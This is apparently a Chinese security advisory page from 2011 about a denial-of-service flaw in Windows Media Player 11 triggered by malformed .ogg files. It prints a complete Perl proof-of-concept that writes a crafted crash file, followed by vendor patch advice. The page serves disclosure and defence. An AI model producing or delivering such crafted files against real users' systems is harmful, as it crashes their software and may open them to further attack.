安全研究

安全漏洞
Microsoft Windows Media Player ".ogg"文件远程拒绝服务漏洞

发布日期:2011-04-18
更新日期:2011-04-18

受影响系统:
Microsoft Media Player 11
描述:
BUGTRAQ  ID: 47413

Windows Media Player是由微软公司开发的一款音、视频播放器。

Microsoft Windows Media Player在处理畸形".ogg"文件时存在远程拒绝服务漏洞,远程攻击者可利用此漏洞使受影响应用程序崩溃,远程执行任意代码。

<*来源:KedAns-Dz
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl
sub logo {
print STDERR << "EOF";
                                                                      
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day[.]com                                   0
1  [+] Support e-mail  : submit[at]1337day[.]com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

EOF
}
# ---------
# Windows Media Player 11 (.ogg) Proof Of Concept Exploit
# Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id[.]com>
# special thanks to : Inj3ct0r Team + exploit-id Team
# ---------
# Tested in Windows XP sp3 France
# Creating The Bad File .OGG And => Bo0M !
# Stack Fram : ogm.dll ! 02B62026 () !
# PoC : 0x02B62026 | MOV | ecx,dword ptr [eax]
my $PoC =
"\x4f\x67\x67\x53\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\xb7\x7a".
"\x00\x00\x00\x00\x00\x00\x73\x6f\x69\x92\x01\x1e\x01\x76\x6f\x72".
"\x62\x69\x73\x00\x00\x00\x00\x02\x80\xbb\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\xbb\x01\x4f\x67\x67\x53\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\xb7\x7a\x00\x00\x01\x00\x00\x00";
open (FILE,">> KedAns.ogg"); # Bad File Here
print FILE $PoC;
close (FILE);
# KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

浏览次数:2836
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障